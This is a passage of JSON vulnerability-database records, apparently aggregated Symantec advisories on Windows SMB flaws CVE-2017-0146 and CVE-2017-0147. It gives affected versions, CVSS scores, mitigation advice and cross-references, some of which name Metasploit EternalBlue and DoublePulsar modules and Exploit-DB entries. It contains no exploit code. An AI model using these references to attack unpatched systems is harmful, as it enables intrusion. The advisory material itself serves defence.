"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": 
"metasploit"}, {"idList": ["CVE-2017-0147"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2018-03-12T06:25:12", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "b6f811f9f2478edc531d2bed693fb7f3cb58da672b05b11d60a7f46ca8a3a8dc", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "024611330f5a6b8c5b50ddba76c4d1e9", "key": "affectedSoftware"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "5c1cd1e39070996194f8d33a24db02ff", "key": "description"}, {"hash": "3c236091754d2db00c1c42f811b3ada4", "key": "cvss"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "f51242d5df99f0b16f54bc3140a1a24a", "key": "href"}, {"hash": "66d6cc2a78eb79d5239c273496f3915f", "key": "title"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], 
"history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96709", "id": "SMNTC-96709", "immutableFields": [], "lastseen": "2018-03-12T06:25:12", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0147 Information Disclosure Vulnerability", "type": "symantec", "viewCount": 67}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-12T06:25:12"}, {"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], 
"bulletinFamily": "software", "cvelist": ["CVE-2017-0147"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to an information-disclosure vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Server 2016 for x64-based Systems\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 6.5}}, "hash": "81af8b6bc95ec3b077cd48d6f229131f68e33357e7b819ae87d0a34a6319bcdf", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96709", "id": "SMNTC-96709", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0147 Information Disclosure Vulnerability", "type": "symantec", "viewCount": 36}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:01"}], "viewCount": 72, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "threatpost", "idList": 
["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:23", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-06-08T19:05:23", "rev": 2}}, "objectVersion": "1.5", 
"affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2016 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, 
{"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "2fd4bebabbccdd3063f9c07be91fcd13"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "ab861885dbe02d09a3a2208dd9731d62"}, {"key": "cvss", "hash": "3c236091754d2db00c1c42f811b3ada4"}, {"key": "description", "hash": "5c1cd1e39070996194f8d33a24db02ff"}, {"key": "href", "hash": "f51242d5df99f0b16f54bc3140a1a24a"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "66d6cc2a78eb79d5239c273496f3915f"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96707", "hash": "340caacebac5e285b90fc8d68db2f63ea4c5e12588b85abb65ada90528bdd30d", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0146 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a 
remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or 
anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96707", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0146"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": 
"2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0146"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows 
Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. 
\n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 9.0}}, "hash": "a081bda7eb2c792f9cd4bdfa1315568b75984a8fc0be9116060361dfd4bf5a82", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96707", "id": "SMNTC-96707", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0146 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 78}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:01"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, 
{"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-12T16:12:10", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": 
